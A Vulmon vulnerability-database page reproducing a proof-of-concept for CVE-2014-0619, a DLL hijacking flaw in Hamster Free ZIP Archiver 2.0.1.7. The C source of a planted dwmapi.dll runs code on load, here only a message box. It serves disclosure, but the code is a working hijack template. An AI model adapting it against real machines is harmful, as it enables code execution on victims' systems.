Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2014-0619

Publish Date: 16 Oct 2014

Source

                /*
* Title: Hamster Free ZIP Archiver Dll Hijacking Exploit 2.0.1.7 (dwmapi.dll)
* Version: 2.0.1.7
* Tested on: Windows XP SP2 en
* Vendor: http://www.hamstersoft.com/ 
* Software-Link: http://www.hamstersoft.com/online/hfza_site/hfza_site_3_0_0_34_b26122013.exe
* E-Mail: osanda[at]unseen.is
* Author: Osanda Malith Jayathissa
* CVE : CVE-2014-0619
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
*/ 

// All extensions are vulnerable
#include &lt;windows.h&gt; 

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
  {
  case DLL_PROCESS_ATTACH: owned();
  case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
  break;
  }
  return TRUE;
}

int owned() {
  MessageBox(0, "Hamster Free ZIP Archiver DLL Hijacked\nOsanda Malith", "POC", MB_OK);
}
/*EOF*/
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Hamster Free ZIP Archiver 2.0.1.7 DLL Hijacking

Vulmon Search

About

Products

Connect